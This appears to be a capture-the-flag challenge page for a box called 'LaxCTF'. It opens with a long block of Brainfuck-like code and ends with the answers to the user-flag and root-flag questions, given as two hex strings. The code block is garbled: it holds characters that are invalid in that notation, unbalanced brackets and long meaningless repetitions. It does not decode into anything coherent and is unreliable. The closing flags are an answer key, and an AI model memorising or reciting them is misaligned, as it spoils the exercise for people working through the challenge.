>+++<]>.+[--->++|>.+++|>.+++|>.+++|>.+++|>.+++|---->+|>..+++|--->+|>..+++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..+|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..++|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+|>..+
+<]>.-----[-->++]>.[--->+<]>-----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[--->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[-->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>----[--->+<]>-----[--->+<]>----[--->+<]>----[--->+<]
>+++<]>-.[-->+<]>++++++++++++++.>-[--->+<]>-.--.>+[---->+++<]>+.[--->+++<]>-.-.>+[--->+
+<]>+.+++++[->++++<]>..----->-[--->+<]>-..+++++[->++<]>+.>-[--->+<]>+.--.
++<]>+.>-[---->+<]>.-[--->+++++<]>.[-->+++++<]>.--->+
[->++++<]>++.----------->+[-->+
>++<]>.------[--->+<]>+.--.>-[--->+<]>+.--.>+(]>+.+++.[->+++++<]>+.[->++++<]>+.--.+[---
>+<]>++.[++>---<]>--,>-[--->+<]>.[-->++|<]>++,>+[--->++|>]>,-[---->+<]>,-[---->+<]>.-[---->+<]>+----
+.--[--->+<]>--->+[--->+++++<]>---->+(---->++++++<]>--[---->+
+<]>+.>+[---->+++<]>+.[--->+++<]>.-[--->+<]>-.>-[--->+<]>+.-[--->+<]>.>+[--->++<]>.++
+<]>-.--[->+++<]>-.--[->+++]>++.[---->+<]>++.[--->+<]>-.--[->+
+<]>+..-----[->+++++|
[--->+<]>.>-[--->+<]>--[->+++]>+.++++++++++++--[--->++<]>.--.>+[--->++<]>.>-[---->+<]>++.+++[->++<]>.
+<]>.+[--->++++<]>.>-[--->+<]>---(--->+<]>---(--->++
```

```
>+<]>-.------+[->++++<]>-.>-[-->+<]>-.--[-->++++<]>+.[->++++<]>-.->-[-->+<]>-.-------+++
>+<]>+.+[---->+<]>.+++++++.-----[->+++++<]>++.+[-->++<]>++.+[->+++++<]>+.>-[--->+<]>.++++.
[--->+<]>-.--.[->+++++<]>-.[-->+<]>-.--.--[->+++<]>-.+[->++++<]>-.[-->+<]>---.+[->++
+<]>+.[-->+<]>++++.>+[--->++<]>.[-->++]>+++++.-[--->++<]>.++[++>---<]>+.>-[--->+<]>.--[----
>+<]>+.-----++++.+++.+++.-------[----->+<]>.>+[--->++<]>+.-----++++.+++.+++.-------[------>+<]>+.++++
+.-----[----->+<]>.-[--->+++<]>.+.[--->+
>+<]>+++.>+[--->++4]>,---.-------.>+[--->++4]>,---------.+++
[++>---<]>--.>+[--->++<]>.[-->+++++----[->+++]>.+[-->+++|]>.>+[--->++<]>.+++++[->+++
[---->+++++<]>-.[---->+<]>-.[--->+<]>-.[--->+<]>-.[--->+<]>.[---
>+<]>-.>+[--->++<]>.+.---.>-[---->+<]>-.>-[--->+<]>-.----.>-
>+<]>.-----.>+[--->++<]>+.---.>+[--->+++]>+.+++.>+[--->+++]>+.+++.>+[--->++]>++++.>+[--->+++]>++++.>+[--->+++]>++++.>+[--->+++]>++++.>+[--->+++]>++++.>+[--->+++]>++++.
+.------>+[--->++<]>+.++++++++++++++++-[->++++++<]>.[-->+++<]>+.>+[--->++<]>.---[---->+<]>.----[->++
+++++.[---->+<]>.[->+++++<]>-.--[--->+<]>++.+[++>----<]>+.---->+<]>----[--->++++<]>-.--[--->+
>+<]>++.------->+[--->++<]>..+++++[->++++<]>..-[--->+<]>+.+(--->++<]>.>+[---->+++<]>+.+++>-[---
<]>+.>-[--->+<]>.-[--->+<]>---+++|--->+<]>---+++|--->+<]>---++++|--->+<]>.--
```

+++++<]>-.>+[--->++<]>+.-.+++++[->++++<]>.>+[--->++<]>+.--.-[--->+++<]>-.-[--->++<]>-.[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]>..[--->++<]

[Task 1] LaxCTF

No clues! Get the user and root flags.

#1
What is the user flag?

79d798fdcfd3829c7420892d8988d5a7

#2What is the root flag?

4dad5e736a26999c9d7773464013dd41